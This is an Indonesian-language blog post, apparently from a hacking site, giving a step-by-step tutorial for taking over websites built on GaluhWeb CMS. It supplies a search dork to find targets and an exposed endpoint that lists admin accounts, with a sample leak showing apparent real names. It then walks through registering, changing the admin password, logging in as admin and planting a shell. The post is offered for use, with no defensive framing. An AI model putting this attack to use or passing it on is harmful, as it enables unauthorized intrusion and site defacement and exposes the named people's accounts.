tutorial ini gua dapet secara gak sengaja :v tapi gua binggung mau pake turtor apa lagi dan mau gak mau semua tempat gu masukin dan ketemu dah :V langsung aja dah dari pada basah basih ikutin step by step
dork:
intext:Powered By: GaluhWeb CMS
Exploit: ajaxusername.html
jadi gni /ajaxusername.html
kalo misalnya ada bacaan
{"page":1,"total":"6","rows":[{"id":"37","cell":["muftiahmad","Ahmad Syarifudin","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"36","cell":["bindaandalia","binda andalia","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"34","cell":["EdwinRico","Edwin Rico","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"33","cell":["FennyDwi","Fenny Dwi Rahadianti, S.kom","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"32","cell":["HarryTU","Harry Darmawan","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]},{"id":"1","cell":["admin","Admin","Admin","active","<\/a> \n\t\t\t<\/a> \n\t\t\t"]}]}
beararti vuln :v
kemdina langsung aja register
site/ajaxusername.html isi data data lo hati hati di tangkap polisi bercanda
kalo udah selesai register
langsung aja login
site/login.html kalo gak ada carii tempat login lain :v
kalo udah masuk masukin lagi exploit /ajaxusername.html
lalu ubah password admin gimana ? pencet baccan admin
masukin dehh password bebebas semerdeka lo :D
lalu lu logout dan masuk lagi ke login.html masukin username admin password yang tadi lu bikin :v
dan net not lu udah masuk sebagai admin tinggal mau lu tanm shell kek atau tanam pohon bebass
:D
jelas
EmoticonEmoticon